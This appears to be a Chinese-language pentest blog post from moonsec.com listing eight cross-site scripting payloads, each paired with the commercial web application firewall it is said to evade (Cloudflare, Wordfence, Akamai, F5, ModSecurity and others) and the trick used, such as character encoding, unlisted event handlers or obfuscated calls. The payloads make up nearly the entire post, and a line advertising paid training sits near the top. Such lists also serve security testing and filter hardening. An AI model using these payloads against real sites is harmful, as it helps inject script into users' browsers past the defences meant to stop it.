1. 首页
  2. 渗透测试

8 个 WAF绕过

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

个

名称: Cloudflare
有效负载: <a"/onclick=(confirm)()>click
绕过技术:非空白填充

名称: Wordfence
负载: <a/href=javascript&colon;alert()>click
绕过技术:数字字符编码

名称:Barracuda
有效载荷: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
绕过技术:数字字符编码

名称: Akamai
负载: <d3v/onauxclick=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: Comodo
有效负载: <d3v/onauxclick=(((confirm)))``>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: F5
负载: <d3v/onmouseleave=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: ModSecurity
负载: <details/open/ontoggle=alert()>
绕过技术:黑名单中缺少标签(事件处理程序?)

名称: dotdefender
负载: <details/open/ontoggle=(confirm)()//
绕过技术:黑名单中缺少标签、函数调用混淆和备用标签结尾

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/4526.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息